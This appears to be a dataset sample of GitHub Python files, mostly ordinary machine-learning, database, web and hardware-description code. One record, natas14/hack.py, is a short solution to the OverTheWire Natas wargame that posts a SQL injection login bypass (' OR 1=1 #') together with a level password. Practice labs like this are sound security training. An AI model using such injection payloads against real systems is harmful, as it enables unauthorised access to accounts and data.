The dataset has 29 columns:

| column | type / stats |
|---|---|
| blob_id | string (lengths 40 to 40) |
| directory_id | string (lengths 40 to 40) |
| path | string (lengths 2 to 616) |
| content_id | string (lengths 40 to 40) |
| detected_licenses | list (lengths 0 to 69) |
| license_type | string (2 classes) |
| repo_name | string (lengths 5 to 118) |
| snapshot_id | string (lengths 40 to 40) |
| revision_id | string (lengths 40 to 40) |
| branch_name | string (lengths 4 to 63) |
| visit_date | timestamp[us] |
| revision_date | timestamp[us] |
| committer_date | timestamp[us] |
| github_id | int64 (2.91k to 686M, nullable) |
| star_events_count | int64 (0 to 209k) |
| fork_events_count | int64 (0 to 110k) |
| gha_license_id | string (23 classes) |
| gha_event_created_at | timestamp[us] |
| gha_created_at | timestamp[us] |
| gha_language | string (213 classes) |
| src_encoding | string (30 classes) |
| language | string (1 class) |
| is_vendor | bool (2 classes) |
| is_generated | bool (2 classes) |
| length_bytes | int64 (2 to 10.3M) |
| extension | string (246 classes) |
| content | string (lengths 2 to 10.3M) |
| authors | list (lengths 1 to 1) |
| author_id | string (lengths 0 to 212) |

Sample records follow, one per file, with the metadata fields listed before the file content.
blob_id: c4963b958ee261772f4dc13bfa08cfd29b9b4df6
directory_id: d2b5a35ff2726cec0c215c13baec499847ac7436
path: /perceptron/perceptron.py
content_id: c71b519591f5b5f95f2a3748a301e6b4c9c75668
detected_licenses: [] | license_type: no_license
repo_name: samantamrityunjay/ML-from-scratch
snapshot_id: ec9c1bbd57b0650a79822b7bdbeece9c7dcfb0f1
revision_id: d50283288e1aa0e14d021b603ba77368bd745e6e
branch_name: refs/heads/main
visit_date: 2023-02-19T10:19:14.718420 | revision_date: 2021-01-19T14:49:00 | committer_date: 2021-01-19T14:49:00
github_id: 329,615,487 | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 1,117 | extension: py
content:
import numpy as np
class Perceptron:
def __init__(self, lr=0.01, n_iters=1000):
self.lr = lr
self.n_iters = n_iters
self.activation_func = self._unit_step_func
self.weights = None
self.bias = None
def fit(self,X,y):
n_samples, n_features = X.shape
#init weights
self.weights = np.zeros(n_features)
self.bias = 0
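# Map labels to {0, 1} so they match the output of the unit step activation.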
y_ = np.array([1 if i>0 else 0 for i in y])
for _ in range(self.n_iters):
for idx, x_i in enumerate(X):
linear_output = np.dot(x_i, self.weights) +self.bias
y_predicted = self.activation_func(linear_output)
update = self.lr *(y_[idx] - y_predicted)
self.weights+=update*x_i
self.bias+=update
def predict(self,X):
linear_output = np.dot(X,self.weights) +self.bias
y_predicted = self.activation_func(linear_output)
return y_predicted
def _unit_step_func(self,x):
return np.where(x>=0,1,0)
authors: ["samantamrityunjay98@gmail.com"]
author_id: samantamrityunjay98@gmail.com

blob_id: a39a865abd1b554b5a97e02ea4e134a717db67fb
directory_id: 6d710a4d8a856e8c197ce930f50bf5023f12cc69
path: /app/database/base.py
content_id: 0ce1a84a1fe73c2e7d65b5f087551ac122423693
detected_licenses: [] | license_type: no_license
repo_name: saikiranreddyyarava/API-implementation-using-GraphQL
snapshot_id: 30013e0bacbe9198e52ab18c63ba770507f3d0d1
revision_id: d86e31cc7d9df145a58892b340136c4d23d12682
branch_name: refs/heads/master
visit_date: 2023-05-24T20:30:24.188638 | revision_date: 2020-06-11T10:43:00 | committer_date: 2020-06-11T10:43:00
github_id: 267,617,584 | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: 2023-05-22T23:30:37 | gha_created_at: 2020-05-28T14:50:53 | gha_language: Python
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 717 | extension: py
content:
import os
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import scoped_session, sessionmaker
# Create database engine
db_name = 'database.db'
db_path = os.path.join(os.path.dirname(__file__), db_name)
db_uri = 'sqlite:///{}'.format(db_path)
engine = create_engine(db_uri, convert_unicode=True)
# Declarative base model to create database tables and classes
Base = declarative_base()
Base.metadata.bind = engine # Bind engine to metadata of the base class
# Create database session object
db_session = scoped_session(sessionmaker(bind=engine, expire_on_commit=False))
Base.query = db_session.query_property() # Used by graphql to execute queries
authors: ["kiranreddyyarava@gmail.com"]
author_id: kiranreddyyarava@gmail.com

blob_id: 8aa012ab93d1849ae33f7995f1509da4a0a3fe20
directory_id: 6f9a5717fed38b0a79c399f7e5da55c6a461de6d
path: /Programmers/Graph/FarthestNode.py
content_id: f261f2fbb6a0f8e8e24688a1a52e9fb5a8351bba
detected_licenses: [] | license_type: no_license
repo_name: Alfred-Walker/pythonps
snapshot_id: d4d3b0f7fe93c138d02651e05ca5165825676a5e
revision_id: 81ef8c712c36aa83d1c53aa50886eb845378d035
branch_name: refs/heads/master
visit_date: 2022-04-16T21:34:39.316565 | revision_date: 2020-04-10T07:50:46 | committer_date: 2020-04-10T07:50:46
github_id: 254,570,527 | star_events_count: 1 | fork_events_count: 1
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 1,260 | extension: py
content:
from collections import deque
def get_adjacent(n, edge):
adjacent_list = dict()
for i in range(1, n + 1):
adjacent_list[i] = []
for e in edge:
start = e[0]
end = e[1]
if end not in adjacent_list[start]:
adjacent_list[start].append(end)
if start not in adjacent_list[end]:
adjacent_list[end].append(start)
return adjacent_list
def solution(n, edge):
adjacent_list = get_adjacent(n, edge)
min_dist = dict()
queue = deque()
queue.append((1, 0))
visited = [False] * (n + 1)
visited[1] = True
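# BFS from node 1; each node's shortest distance is recorded the first time it is visited.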
while len(queue) != 0:
q = queue.popleft()
for adj in adjacent_list[q[0]]:
if visited[adj]:
continue
dist = q[1] + 1
min_dist[adj] = dist
visited[adj] = True
queue.append((adj, dist))
# print(min_dist.items())
sorted_list = sorted(min_dist.items(), key=lambda x: x[1], reverse=True)
# print(sorted_list)
farthest = sorted_list[0][1]
answer = 0
for s in sorted_list:
if s[1] == farthest:
answer += 1
else:
break
return answer
n = 5
edge = [[1, 4], [2, 3], [4,5]]
print(solution(n, edge))
authors: ["studio.alfred.walker@gmail.com"]
author_id: studio.alfred.walker@gmail.com

blob_id: 8f544a5feb3ff254089a1fedc19a6c8d98ab7fad
directory_id: 65f1c703905d6c9a44a86c694d0281665b7e9a90
path: /EJERCICIOS EN CLASE/18.08.2021/text.py
content_id: 093bff2e04a7bac91803ac5d609ca5b6a6d3a795
detected_licenses: [] | license_type: no_license
repo_name: JosueSalgado01/Python
snapshot_id: 1b1fb85386a9192f14708b604e29418f7da344bc
revision_id: b72fce05155915e3e2eedd88caa81ebbb5830f86
branch_name: refs/heads/main
visit_date: 2023-07-12T07:44:24.816992 | revision_date: 2021-08-26T17:06:03 | committer_date: 2021-08-26T17:06:03
github_id: 399,242,618 | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: 2021-08-23T21:20:42 | gha_created_at: 2021-08-23T20:43:06 | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 227 | extension: py
content:
# -*- coding: utf-8 -*-
"""
Created on Wed Aug 18 08:54:27 2021
@author: Dell
"""
pi=22/7
print(pi)
print("{:.3f}".format(pi))
print("{:.2f}".format(pi))
print("{:.54f}".format(pi))
va=25/5
print(va)
print("")
authors: ["noreply@github.com"]
author_id: JosueSalgado01.noreply@github.com

blob_id: 58f433d9a2e0696e418204f53be23a1bc7ba976a
directory_id: 54b238d50baee4f483c0690d77d106ebc30a4c0a
path: /aetherling/space_time/modules/higher_order.py
content_id: 3012f34c5022b4b750e4f5bba8e45f554c96eae5
detected_licenses: ["MIT"] | license_type: permissive
repo_name: David-Durst/aetherling
snapshot_id: 4a5d663a98428769834e8ebbf7e9b63cb7788319
revision_id: 91bcf0579608ccbf7d42a7bddf90ccd4257d6571
branch_name: refs/heads/master
visit_date: 2021-08-16T01:48:20.476097 | revision_date: 2020-06-19T19:25:46 | committer_date: 2020-06-19T19:25:46
github_id: 114,405,958 | star_events_count: 10 | fork_events_count: 1
gha_license_id: MIT | gha_event_created_at: 2021-03-29T17:44:39 | gha_created_at: 2017-12-15T19:46:51 | gha_language: Python
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 9,198 | extension: py
content:
from aetherling.space_time.space_time_types import *
from aetherling.space_time.type_helpers import valid_ports, strip_tseq_1_0_sseq_1, strip_tseq_1_n_sseq_1, \
num_nested_space_layers, replace_atom_tuple_with_t0, time_last_valid
from aetherling.space_time.nested_counters import DefineNestedCounters
from aetherling.modules.map_fully_parallel_sequential import DefineNativeMapParallel
from aetherling.modules.reduce import DefineReduceParallel, DefineReduceSequential, tupleToTwoInputsForReduce
from aetherling.modules.initial_delay_counter import InitialDelayCounter
from aetherling.modules.term_any_type import TermAnyType
from aetherling.helpers.nameCleanup import cleanName, undup_
from magma import *
from mantle.coreir.arith import *
from mantle.coreir.logic import *
from mantle.coreir.compare import *
from mantle.coreir import DefineCoreirConst, DefineRegister
from magma.circuit import DefineCircuitKind
from aetherling.modules.register_any_type import DefineRegisterAnyType
int_width = ST_Int().magma_repr().size()
bit_width = ST_Bit().magma_repr().size()
@cache_definition
def DefineMap_S(n: int, op: DefineCircuitKind, has_valid=True) -> DefineCircuitKind:
assert op.binary_op == False
map_s = DefineNativeMapParallel(n, op, True, has_ready=False, has_valid=has_valid)
map_s.binary_op = False
map_s.st_in_t = [ST_SSeq(n, op.st_in_t[0])]
map_s.st_out_t = ST_SSeq(n, op.st_out_t)
return map_s
@cache_definition
def DefineMap2_S(n: int, op: DefineCircuitKind, has_valid=True) -> DefineCircuitKind:
assert op.binary_op == True
map_s = DefineNativeMapParallel(n, op, True, has_ready=False, has_valid=has_valid)
map_s.binary_op = True
map_s.st_in_t = [ST_SSeq(n, op.st_in_t[0]), ST_SSeq(n, op.st_in_t[1])]
map_s.st_out_t = ST_SSeq(n, op.st_out_t)
return map_s
@cache_definition
def DefineMap_T(n: int, inv: int, op: DefineCircuitKind) -> DefineCircuitKind:
assert op.binary_op == False
return DefineMap_T_1_or_2(n, inv, op, True)
@cache_definition
def DefineMap2_T(n: int, inv: int, op: DefineCircuitKind) -> DefineCircuitKind:
assert op.binary_op == True
return DefineMap_T_1_or_2(n, inv, op, False)
@cache_definition
def DefineMap_T_1_or_2(n: int, inv: int, op: DefineCircuitKind, is_unary: bool) -> DefineCircuitKind:
class _Map_T(Circuit):
name = undup_("Map_T_n{}_i{}".format(str(n), str(inv)).replace("__","_"))
op_num_ports = len(op.IO.Decl) // 2
op_port_names = op.IO.Decl[::2]
op_port_types = op.IO.Decl[1::2]
non_clk_ports = []
for i in range(op_num_ports):
if op_port_names[i] == 'CLK':
continue
non_clk_ports += [op_port_names[i], op_port_types[i]]
IO = non_clk_ports + ClockInterface(has_ce=False, has_reset=False)
binary_op = not is_unary
if is_unary:
st_in_t = [ST_TSeq(n, inv, op.st_in_t[0])]
else:
st_in_t = [ST_TSeq(n, inv, op.st_in_t[0]), ST_TSeq(n, inv, op.st_in_t[1])]
st_out_t = ST_TSeq(n, inv, op.st_out_t)
@classmethod
def definition(cls):
op_instance = op()
for i in range(cls.op_num_ports):
port_name = cls.op_port_names[i]
wire(getattr(cls, port_name), getattr(op_instance, port_name))
return _Map_T
@cache_definition
def DefineReduce_S(n: int, op: DefineCircuitKind, has_valid=False) -> DefineCircuitKind:
class _Reduce_S(Circuit):
assert type(strip_tseq_1_n_sseq_1(op.st_in_t[0])) == ST_Atom_Tuple
name = "Reduce_S_n{}".format(str(n))
binary_op = False
st_in_t = [ST_SSeq(n, replace_atom_tuple_with_t0(op.st_in_t[0]))]
st_out_t = ST_SSeq(1, op.st_out_t)
IO = ['I', In(st_in_t[0].magma_repr()), 'O', Out(st_out_t.magma_repr())] + ClockInterface()
if has_valid:
IO += valid_ports
@classmethod
def definition(cls):
op_renamed = tupleToTwoInputsForReduce(op, num_nested_space_layers(cls.st_in_t[0]) - 1)
reduce = DefineReduceParallel(n, op_renamed)()
wire(cls.I, reduce.I)
red_reg = DefineRegisterAnyType(cls.st_out_t.magma_repr())()
wire(reduce.O, red_reg.I[0])
wire(cls.O, red_reg.O)
if has_valid:
valid_reg = DefineRegister(1)()
wire(cls.valid_up, valid_reg.I[0])
wire(valid_reg.O[0], cls.valid_down)
return _Reduce_S
@cache_definition
def DefineReduce_T(n: int, i: int, op: DefineCircuitKind) -> DefineCircuitKind:
class _Reduce_T(Circuit):
# second case handles partially parallel generated code where reduce over a map_s 1
assert type(strip_tseq_1_n_sseq_1(op.st_in_t[0])) == ST_Atom_Tuple
name = "Reduce_T_n{}_i{}".format(str(n), str(i))
binary_op = False
st_in_t = [ST_TSeq(n, i, replace_atom_tuple_with_t0(op.st_in_t[0]))]
st_out_t = ST_TSeq(1, n+i-1, op.st_out_t)
IO = ['I', In(st_in_t[0].magma_repr()), 'O', Out(st_out_t.magma_repr())] + valid_ports + ClockInterface()
@classmethod
def definition(cls):
red_reg = DefineRegisterAnyType(cls.st_out_t.magma_repr())()
if n > 1:
op_renamed = tupleToTwoInputsForReduce(op, num_nested_space_layers(cls.st_in_t[0]))
reduce = DefineReduceSequential(n, op_renamed, has_ce=True)()
enable_counter = DefineNestedCounters(cls.st_in_t[0],
has_last=False,
has_ce=True)()
wire(enable_counter.valid, reduce.CE)
wire(cls.valid_up, enable_counter.CE)
wire(cls.I, reduce.I)
wire(reduce.out, red_reg.I)
else:
wire(cls.I, red_reg.I)
wire(cls.O, red_reg.O)
# valid output after first full valid input collected
valid_delay = InitialDelayCounter(time_last_valid(cls.st_in_t[0]) + 1)
wire(cls.valid_up, valid_delay.CE)
wire(cls.valid_down, valid_delay.valid)
if n > 1:
# ignore inner reduce ready and valid
wire(reduce.valid, TermAnyType(Bit).I)
wire(reduce.ready, TermAnyType(Bit).I)
return _Reduce_T
@cache_definition
def DefineAdd_1_S(op: DefineCircuitKind, has_valid=False) -> DefineCircuitKind:
class _Add_1_S(Circuit):
name = "Add_1_S"
binary_op = False
st_in_t = op.st_in_t
st_out_t = ST_SSeq(1, op.st_out_t)
IO = ['I', In(st_in_t[0].magma_repr()), 'O', Out(st_out_t.magma_repr())]
if has_valid:
IO += valid_ports
@classmethod
def definition(cls):
op_inst = op()
wire(cls.I, op_inst.I)
wire(cls.O[0], op_inst.O)
if has_valid:
wire(cls.valid_up, op_inst.valid_up)
wire(cls.valid_down, op_inst.valid_down)
return _Add_1_S
@cache_definition
def DefineRemove_1_S(op: DefineCircuitKind, has_valid=False) -> DefineCircuitKind:
class _Remove_1_S(Circuit):
name = "Remove_1_S"
binary_op = False
st_in_t = [ST_SSeq(1, op.st_in_t[0])]
st_out_t = op.st_out_t
IO = ['I', In(st_in_t[0].magma_repr()), 'O', Out(st_out_t.magma_repr())]
if has_valid:
IO += valid_ports
@classmethod
def definition(cls):
op_inst = op()
wire(cls.I[0], op_inst.I)
wire(cls.O, op_inst.O)
if has_valid:
wire(cls.valid_up, op_inst.valid_up)
wire(cls.valid_down, op_inst.valid_down)
return _Remove_1_S
@cache_definition
def DefineAdd_1_0_T(op: DefineCircuitKind, has_valid=False) -> DefineCircuitKind:
class _Add_1_0_T(Circuit):
name = "Add_1_S"
binary_op = False
st_in_t = op.st_in_t
st_out_t = ST_TSeq(1, 0, op.st_out_t)
IO = ['I', In(st_in_t[0].magma_repr()), 'O', Out(st_out_t.magma_repr())]
if has_valid:
IO += valid_ports
@classmethod
def definition(cls):
op_inst = op()
wire(cls.I, op_inst.I)
wire(cls.O, op_inst.O)
if has_valid:
wire(cls.valid_up, op_inst.valid_up)
wire(cls.valid_down, op_inst.valid_down)
return _Add_1_0_T
@cache_definition
def DefineRemove_1_0_T(op: DefineCircuitKind, has_valid=False) -> DefineCircuitKind:
class _Remove_1_0_T(Circuit):
name = "Remove_1_S"
binary_op = False
st_in_t = [ST_TSeq(1, 0, op.st_in_t[0])]
st_out_t = op.st_out_t
IO = ['I', In(st_in_t[0].magma_repr()), 'O', Out(st_out_t.magma_repr())]
if has_valid:
IO += valid_ports
@classmethod
def definition(cls):
op_inst = op()
wire(cls.I, op_inst.I)
wire(cls.O, op_inst.O)
if has_valid:
wire(cls.valid_up, op_inst.valid_up)
wire(cls.valid_down, op_inst.valid_down)
return _Remove_1_0_T
authors: ["davidbdurst@gmail.com"]
author_id: davidbdurst@gmail.com

blob_id: 84dafa68320203f48c3ca3f663ff1ee69c66ad13
directory_id: 134533df11f19ff03c4babfdc800c2db20bb013c
path: /image_upload_app/asgi.py
content_id: e944226e506abd82395c7a113d43bc630ac26256
detected_licenses: [] | license_type: no_license
repo_name: deepak78194/image_upload
snapshot_id: 711617e35181466b5b14e049dbe1083d9c820582
revision_id: 37b2b37a191bd6a1d29e2155a507746d9b602b9a
branch_name: refs/heads/master
visit_date: 2023-03-26T22:48:28.486368 | revision_date: 2021-03-31T08:03:27 | committer_date: 2021-03-31T08:03:27
github_id: 353,254,855 | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 409 | extension: py
content:
"""
ASGI config for image_upload_app project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'image_upload_app.settings')
application = get_asgi_application()
authors: ["deepak78194@gmail.com"]
author_id: deepak78194@gmail.com

blob_id: effed3a0acdca44801bad039f99958bf2a182ddc
directory_id: 001280151943b24db75e68fbbc0d43df82a3579d
path: /modules/EBO/ebo_CV.py
content_id: a582d3a09617a8a735e460b616baf4fb4e7fed61
detected_licenses: [] | license_type: no_license
repo_name: federicovitti/DIVIDE_et_CONQUER-bayes_opt
snapshot_id: 67e4853e59c5e718676f189ba73bb6a552cf471d
revision_id: e5388ad2c0f5458d367aeefe9ce0fd6af2ec1335
branch_name: refs/heads/master
visit_date: 2021-05-01T18:56:26.976064 | revision_date: 2018-02-10T13:00:36 | committer_date: 2018-02-10T13:00:36
github_id: 121,011,761 | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 8,048 | extension: py
content:
import numpy as np
import helper_ebo as helper
import time
from mypool import MyPool
from mondrian import MondrianTree
import os
try:
import cPickle as pickle
except:
import pickle
from representation import DenseL1Kernel
import scipy.linalg
import logging
'''
Ensemble Bayesian Optimization
'''
class ebo(object):
def __init__(self, f, options):
check_valid_options(options)
self.f = f
self.options = options
self.all_besty = list()
# initialization
if 'X' in options and 'y' in options:
X, y = options['X'], options['y']
self.opt_value = y.max()
self.options['max_value'] = self.opt_value
else:
X, y = np.empty((0, options['dx'])), np.empty((0, 1))
self.X, self.y = X.copy(), y.copy()
options['X'], options['y'] = None, None
# parallel pool
self.pool = MyPool(options['pid'], options['datadir'], options['useAzure'], options['thresAzure'])
# hyper parameters
if 'z' in options and 'k' in options:
self.z, self.k = options['z'], options['k']
else:
self.z, self.k = None, None
# for timing
self.timing = []
self.variance = options['gp_sigma'] ** 2
def get_params(self):
all_params = ['x_range', 'T', 'B', 'dim_limit', 'min_leaf_size', 'max_n_leaves', 'n_bo', 'n_top']
return [self.options[t] for t in all_params]
def run(self,):
x_range, T, B, dim_limit, min_leaf_size, max_n_leaves, n_bo, n_top = self.get_params()
tstart = self.X.shape[0]/B
tot_time = np.empty(T)
bestnewY = np.empty(T)
simple_regret = np.empty(T)
for t in range(T):
init_time = time.time()
self.options['t'] = t
ref = self.y.min() if self.y.shape[0]>0 else None
self.tree = MondrianTree(self.X, self.y, x_range, max_n_leaves, reference=ref)
leaves = self.tree.grow_tree(min_leaf_size= min_leaf_size)
tot_eval = np.ceil(2.0*B)
# this might be dangerous if high dimension and R>1
tot_volumn = np.array([n.volumn for n in leaves]).sum()
parameters = [[0, n.X, n.y, n.x_range, False, np.maximum(n_bo, np.ceil((tot_eval*n.volumn/tot_volumn)).astype(int)), self.options] for n in leaves]
# run bo learning in parallel
res = self.pool.map(parameters, 'iter' + str(t))
# allocate worker budget
newX, newacf, z_all, k_all, besty_all = zip(*res)
self.opt_value = besty_all[0]
# sync hyper parameters
if len(z_all) == 1:
logging.error(z_all)
self.z = np.array(z_all[0])
for zz in z_all:
if zz.size != x_range.shape[1]:
print ('zz wrong size?')
print (zz)
assert 0 == 1
if self.options['gibbs_iter'] != 0:
self.z = helper.mean_z(np.array(z_all), dim_limit)
self.k = np.mean(k_all, axis=0).astype(int)
# get newX
newX = np.vstack(newX)
newacf = np.hstack(newacf)
newX = self.choose_newX(newX, newacf, n_top, B)
# map again
parameters = [[self.f, self.X, self.y, x_range, True, [x], self.options] for x in newX]
newY = self.pool.map(parameters, 'eval' + str(t), not self.options['func_cheap'])
bestnewY[t] = np.asarray(newY).max()
# update X, y
self.X = np.vstack((self.X, newX))
self.y = np.vstack((self.y, newY))
self.print_step(newX, t)
bestx, besty, cur = self.get_best()
simple_regret[t] = -besty - self.options['f.min']
if t == 0: tot_time[t] = time.time() - init_time
else: tot_time[t] = tot_time[t-1] + time.time()-init_time
return -bestnewY, simple_regret, tot_time
def choose_newX(self, newX, newacf, n_top, B):
inds = newacf.argsort()
if 'heuristic' in self.options and self.options['heuristic']:
n_top = np.ceil(B/2).astype(int)
inds_of_inds = np.hstack((range(n_top), np.random.permutation(range(n_top,len(inds)))))
newX = newX[inds[inds_of_inds[:B]]]
return newX
good_inds = [inds[0]]*B
len_inds = len(inds)
jbest = 0
maxjbest = 0
next_ind = 1
all_candidates = np.arange(1, len_inds)
kern = DenseL1Kernel(self.z, self.k)
rec = []
while next_ind < B:
jnext = maxjbest + n_top
candidates = all_candidates[:jnext]
assert len(candidates) > 0, 'B > number of selections?'
maxlogdet = -np.float('inf')
jbest = -1
curX = newX[good_inds[:next_ind]]
Ky = kern(curX) + self.variance*np.eye(curX.shape[0])
# compute K + sigma^2I inverse
factor = scipy.linalg.cholesky(Ky)
for j in candidates:
cur_ind = inds[j]
marginal = self.compute_marginal_det(curX, newX[cur_ind], factor, kern) - newacf[j]
if maxlogdet < marginal:
maxlogdet = marginal
jbest = j
if jbest > maxjbest:
maxjbest = jbest
good_inds[next_ind] = inds[jbest]
all_candidates = all_candidates[all_candidates != jbest]
next_ind += 1
rec.append(marginal)
return newX[good_inds]
def compute_marginal_det(self, X, xx, factor, kern):
kXn = np.array(kern(xx, X))
det = np.log(kern.xTxNorm - kXn.dot(scipy.linalg.cho_solve((factor, False), kXn.T)).sum())
return det
def get_best(self):
cur = self.y.argmax(axis=0)
self.bestx = self.X[cur]
self.besty = self.f(self.bestx.ravel())
self.all_besty.append(self.besty)
return self.bestx, self.besty, cur
def print_step(self, newX, t):
# if self.options['isplot']:
# plot_ebo(self.tree, newX, t)
bestx, besty, cur = self.get_best()
self.options['opt_value'] = self.y.max()
return bestx, besty
def reload(self):
fnm = self.options['save_file_name']
if not os.path.isfile(fnm):
return False
self.X, self.y, self.z, self.k, self.timing = pickle.load(open(fnm, 'rb'))
print ('Successfully reloaded file.')
# This will save the pool workers
def pause(self):
self.pool.delete_containers()
# Don't call this for our experiments!! It will release all the workers.
def end(self):
self.pool.end()
def save(self):
fnm = self.options['save_file_name']
dirnm = os.path.dirname(fnm)
if not os.path.exists(dirnm):
os.makedirs(dirnm)
pickle.dump([self.X, self.y, self.z, self.k, self.timing], open(fnm, 'wb'))
# print ('saving file... ', time.time() - start, ' seconds')
def check_valid_options(options):
all_params = ['x_range', 'dx', 'max_value', \
'T', 'B', 'dim_limit', 'isplot', 'z', 'k', 'alpha', 'beta', \
'opt_n', 'pid', 'datadir', 'gibbs_iter', 'useAzure', 'n_add', \
'gp_type', 'gp_sigma', 'n_bo', 'n_top', 'min_leaf_size', 'func_cheap', 'thresAzure', 'save_file_name']
for a in all_params:
assert a in options, a + ' is not defined in options.'
assert options['x_range'].shape[1] == options['dx'], 'x_range and dx mismatched.'
if 'X' in options:
assert 'y' in options, 'y undefined.'
assert options['X'].shape[0] == options['y'].shape[0], 'X, y size mismatched.'
assert options['y'].shape[1] == 1, 'y should be n x 1 matrix.'
assert options['X'].shape[1] == options['dx'], 'X should be n x dx matrix.'
# check for gibbs
beta, alpha, x_range, n_add = options['beta'], options['alpha'], options['x_range'], options['n_add']
dim_limit = options['dim_limit']
options['n_add'] = options['dx'] if n_add is None else n_add
n_add = options['n_add']
options['dim_limit'] = options['dx'] if dim_limit is None else dim_limit
assert beta.dtype == float, 'Forgot to set beta to be float?'
assert isinstance(alpha, float) or alpha.dtype == float, 'Forgot to set alpha to be float?'
assert x_range.dtype == float, 'Forgot to set x_range to be float?'
assert len(x_range) == 2 and len(x_range[0]) == len(x_range[1]), 'x_range not well defined'
if isinstance(alpha, int) or isinstance(alpha, float):
options['alpha'] = np.array([alpha*1.0]*n_add)
assert options['alpha'].shape[0] == n_add, 'alpha must be of size n_add'
assert options['k'] is None or np.min(options['k']) >= 2, 'number of tiles must be at least 2'
authors: ["noreply@github.com"]
author_id: federicovitti.noreply@github.com

blob_id: de0872d64dc2b87a12bd051728b834cdf5b98547
directory_id: c7e98347dc9ef53ba73da90a7aa20792bd359a8e
path: /natas14/hack.py
content_id: 647d2cb931c80df4b20291ba17e866e1eb05f73c
detected_licenses: [] | license_type: no_license
repo_name: prp-e/natas_challenges
snapshot_id: 66f74226465d344a149a42dded667574fa8842cd
revision_id: 2d8947fcdb3950a1290db26b36153fd2b8032b58
branch_name: refs/heads/master
visit_date: 2023-01-22T15:59:37.660885 | revision_date: 2020-12-06T12:06:09 | committer_date: 2020-12-06T12:06:09
github_id: 319,023,876 | star_events_count: 4 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 310 | extension: py
content:
import requests
username = "natas14"
password = "Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1"
url = "http://natas14.natas.labs.overthewire.org/"
session = requests.Session()
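# The injected username closes the quoted string and appends OR 1=1 #, so the login query's WHERE clause always matches.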
response = session.post(url, data = {"username" : 'salam" OR 1=1 #', "password": "banoo"}, auth=(username, password))
print(response.text)
authors: ["haghiri75@gmail.com"]
author_id: haghiri75@gmail.com

blob_id: d76016d30946dc67e8f8300c99c8741073113505
directory_id: 35de5c22deac4780daefe6b0f5087886dde66996
path: /tests/resources/test_resource.py
content_id: 7c6716fd154c14c36af5274f346e6947f96a79bf
detected_licenses: ["MIT"] | license_type: permissive
repo_name: cieplak/premo
snapshot_id: 7b7705a5da453cab9fa8f524d657112d746f2090
revision_id: 805714d8797a39e6dd8fc85203843d2fb67054a4
branch_name: refs/heads/master
visit_date: 2021-01-21T03:13:36.192527 | revision_date: 2015-10-21T00:11:18 | committer_date: 2015-10-21T00:11:18
github_id: 35,082,684 | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 805 | extension: py
content:
import json
import flask
import premo
from tests import TestCase
class TestResource(TestCase):
def test_resource(self):
post_response = self.client.post(
flask.url_for('resource.create'),
data=json.dumps(dict(value='binary blob')),
content_type=premo.mimes.Json.content_type
)
self.assertEqual(post_response.status_code, 201)
body = json.loads(post_response.data)
# Validate schema
premo.resources.resource.Resource(**body)
get_response = self.client.get(
flask.url_for('resource.read', id=body['id'])
)
self.assertEqual(get_response.status_code, 200)
body = json.loads(get_response.data)
# Validate schema
premo.resources.resource.Resource(**body)
authors: ["patrick@ldgr.io"]
author_id: patrick@ldgr.io

blob_id: bb74fb6a0619e14a1a42f58aace7e9920ce74d0f
directory_id: 18eac94ff076c1eecd72870ef93ae656906e8673
path: /supervised_learning/0x03-optimization/14-batch_norm.py
content_id: 56b841675b9c90640609d5f43ad97d0601a56297
detected_licenses: [] | license_type: no_license
repo_name: dgquintero/holbertonschool-machine_learning
snapshot_id: c1331ff87e053f9c143a0e503e8db177dfc7aafe
revision_id: c80073d0ef68deeedbe2d991e296ef75f58a220f
branch_name: refs/heads/master
visit_date: 2022-12-19T21:49:10.581793 | revision_date: 2020-10-15T14:56:22 | committer_date: 2020-10-15T14:56:22
github_id: 279,329,167 | star_events_count: 0 | fork_events_count: 1
gha_license_id: null | gha_event_created_at: 2020-09-25T19:11:52 | gha_created_at: 2020-07-13T14:42:03 | gha_language: Python
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 1,179 | extension: py
content:
#!/usr/bin/env python3
"""create_batch_norm_layer function"""
import tensorflow as tf
def create_batch_norm_layer(prev, n, activation):
"""
creates a batch normalization layer for a NN
Arguments:
prev: is the activated output of the previous layer
n: is the number of nodes in the layer to be created
activation: is the activation function
Returns: tensor of the activated output for the layer
"""
init = tf.contrib.layers.variance_scaling_initializer(mode="FAN_AVG")
x = tf.layers.Dense(units=n, activation=None, kernel_initializer=init)
x_prev = x(prev)
scale = tf.Variable(tf.constant(1.0, shape=[n]), name='gamma')
mean, variance = tf.nn.moments(x_prev, axes=[0])
beta = tf.Variable(tf.constant(0.0, shape=[n]), name='beta')
epsilon = 1e-8
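# Normalize the dense layer's output with the batch mean/variance, then apply the learned beta/gamma shift and scale.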
normalization = tf.nn.batch_normalization(x_prev,
mean,
variance,
beta,
scale,
epsilon)
return activation(normalization)
authors: ["dgquintero02@hotmail.com"]
author_id: dgquintero02@hotmail.com

